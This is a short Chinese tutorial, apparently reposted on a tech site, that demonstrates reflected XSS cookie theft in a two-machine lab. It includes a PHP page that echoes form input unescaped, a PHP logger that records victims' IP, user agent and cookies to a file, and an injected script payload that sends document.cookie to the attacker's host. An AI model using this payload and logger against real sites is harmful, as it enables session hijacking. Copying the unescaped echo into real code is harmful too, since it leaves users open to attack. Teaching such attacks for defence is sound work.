利用xss盗取cookie的简单实例

安全 应用安全
本文为利用xss盗取cookie的一个简单实例。

试验环境:

攻击机器  10.1.36.181 stealcookies.php cookie.txt

受害服务器 10.1.36.34 victim.php victim.html

(1)受害者有xss漏洞的脚本victim.php (问题字段用红色标明)

php

session_start();

session_regenerate_id();

echo session_id()."

";

if(isset($_POST["login"]))

{

echo "Hello " .$_POST["name"]."

";

}

?>

(2)对应表单victim.html

id ="form1" name="form1" method="post" action="victim.php">

Name

name="name" type="text" id="name"/>

name="login" type="submit" id="login" value="submit"/>

正常流程:

简单的利用xss盗取cookie实例 - 碳基体 - 碳基体

简单的利用xss盗取cookie实例 - 碳基体 - 碳基体

(3)攻击者盗取cookie的脚本stealcookies.php

php

$ua = $_SERVER["HTTP_USER_AGENT"];

$client_ip = $_SERVER["REMOTE_ADDR"];

$method = $_SERVER["REQUEST_METHOD"];

$referer = $_SERVER["HTTP_REFERER"];

$date = date("F j, Y, g:i a");

$querystring = $_SERVER["QUERY_STRING"];

$log = fopen("cookie.txt","a+");

$str= "IP: $client_ip |Useragent: $ua | Method: $method | REF: $referer | Date: $date | Cookie: $querystring \n";

fwrite($log,$str);

?>

脚本运行的前提条件,在stealcookies.php同一根目录下,有一个有写权限的文件cookie.txt

攻击流程:

在 http://10.1.36.34/victim.html的表单中提交以下语句

<script>document.write(' + encodeURI(document.cookie) + '"/>')</script>

js的意思是生成一个包含攻击者url的图片

简单的利用xss盗取cookie实例 - 碳基体 - 碳基体

接着我们可以看到访问该页面用户的cookie写入到了攻击者的cookie.txt文件里

查看攻击者10.1.36.181上的cookie.txt文件

cat cookie.txt

可以看到收到cookie了。

责任编辑:蓝雨泪 来源: 红黑联盟
相关推荐

2015-08-21 17:02:08

2009-02-23 14:53:24

2016-09-29 14:03:06

2013-11-08 11:15:54

2018-04-18 07:34:58

2014-06-11 14:10:45

2012-08-17 10:54:26

黑客网路安全穆雷

2016-02-15 10:18:11

2020-10-15 10:31:33

利用Prototype

2021-07-02 13:59:13

漏洞Xbox礼品卡微软

2013-05-03 13:22:40

2009-07-18 13:26:48

2022-02-15 13:50:31

漏洞网络安全网络攻击

2013-04-07 10:11:27

2009-09-24 10:06:42

Hibernate实例

2021-09-26 05:32:58

漏洞OperaXSS

2009-08-26 14:31:08

C#打印文件

2012-04-20 11:07:12

Titanium

2011-09-09 16:00:02

Android Web实例

2016-09-02 09:14:26

点赞
收藏

51CTO技术栈公众号